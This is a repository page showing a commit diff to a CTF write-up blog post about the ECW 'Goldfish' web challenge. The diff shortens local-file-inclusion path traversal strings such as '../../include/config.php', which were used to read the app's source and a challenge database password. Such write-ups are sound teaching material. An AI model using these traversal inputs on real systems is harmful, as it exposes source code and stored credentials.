swisskyrepo
/
swisskyrepo.github.io
mirror of https://github.com/swisskyrepo/swisskyrepo.github.io.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Bugfix : Clean Path in Goldfish

pull/1/head
Swissky 2017-11-07 15:17:08 +01:00
parent e4a6aeda85
commit 269d2b3b90
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
_posts/2017-11-7-ECW-CTF.md
View File

@ -157,8 +157,8 @@ I waited hours and hours, nothing happened..
Then I try to fuzz a little bit the "name" field since we could "rewrite" the URL. I finally managed to find an LFI with the source code reflected in the dashboard inside the memo. Thanks to this we could extract all the source code of the WebApp Then I try to fuzz a little bit the "name" field since we could "rewrite" the URL. I finally managed to find an LFI with the source code reflected in the dashboard inside the memo. Thanks to this we could extract all the source code of the WebApp
{% highlight php%} {% highlight php%}
../../././././././././././././././././././index.php ../../index.php
../../././././././././././././././././././include/session.php ../../include/session.php
function checkCookie() function checkCookie()
{ {
$user = null; $user = null;
@ -179,7 +179,7 @@ function checkCookie()
} }
} }
../../././././././././././././././././././include/config.php ../../include/config.php
$db_name = 'web150'; $db_name = 'web150';
$db_login = 'web150'; $db_login = 'web150';
$db_pass = 'Hell0Challenger!'; $db_pass = 'Hell0Challenger!';